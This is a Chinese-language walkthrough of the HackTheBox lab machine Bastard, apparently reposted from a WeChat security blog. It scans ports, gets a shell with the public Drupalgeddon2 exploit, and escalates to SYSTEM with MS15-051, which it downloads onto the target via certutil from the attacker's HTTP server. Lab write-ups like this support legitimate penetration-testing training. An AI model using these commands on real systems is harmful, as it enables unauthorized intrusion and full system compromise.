渗透测试靶机练习No.125 HTB:Bastard(OSCP Prep)

靶机信息

靶机地址:

https://app.hackthebox.com/machines/Bastard

靶场: HackTheBox.com

靶机名称:Bastard

难度: 中等

提示信息:

无

目标: user.txt和root.txt

实验环境

攻击机:Kali 10.10.16.3

靶机:10.10.10.9

信息收集

扫描端口

扫描靶机开放的服务端口

sudo masscan -p1-65535 -i tun0 10.10.10.9 --max-rate 1000

sudo nmap -sC -sV -p 80,135,49154 -O 10.10.10.9 -oN nmap.log

从扫描结果中看到80端口由IIS7.5开启的并且存在robots.txt文件，先来看看80端口

Web渗透

访问后来到登录页面，通过logo和页面下方的提示均可知道CMS程序是Drupal，在nmap扫描结果的robots.txt内容中有版本变更文件CHANGELOG.txt，访问看看来确认版本

发现版本为Drupal 7.54，通过搜索引擎查找是否存在漏洞

https://github.com/dreadlocked/Drupalgeddon2

下载exp

git clone https://github.com/dreadlocked/Drupalgeddon2.git

验证exp

sudo gem install highline
ruby drupalgeddon2.rb http://10.10.10.9 --authentication

运行后出现 几个提示要求输入内容，一路回车不用管

经过exp的不懈努力拿到了shell，先找找flag

type c:usersdimitrisdesktopuser.txt

拿到user.txt，再来看看如何提权

systeminfo

这是一台Windows Server 2008 R2数据中心系统，并且未打过任何补丁，找个内核提权的exp来验证下

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051

下载这个exp并验证

proxychains wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip
unzip MS15-051-KB3045171.zip
cd MS15-051-KB3045171
ls

1。在exp目录下开启HTTP服务

py3 -m http.server

2。靶机上下载exp并执行

certutil.exe -urlcache -split -f http://10.10.16.3:8000/ms15-051x64.exe

验证成功，可以通过这个exp来执行system权限，来找找root的flag

ms15-051x64.exe "cmd /c type c:Usersadministratordesktoproot.txt"

拿到root.txt，游戏结束

原文始发于微信公众号（伏波路上学安全）：渗透测试靶机练习No.125 HTB:Bastard(OSCP Prep)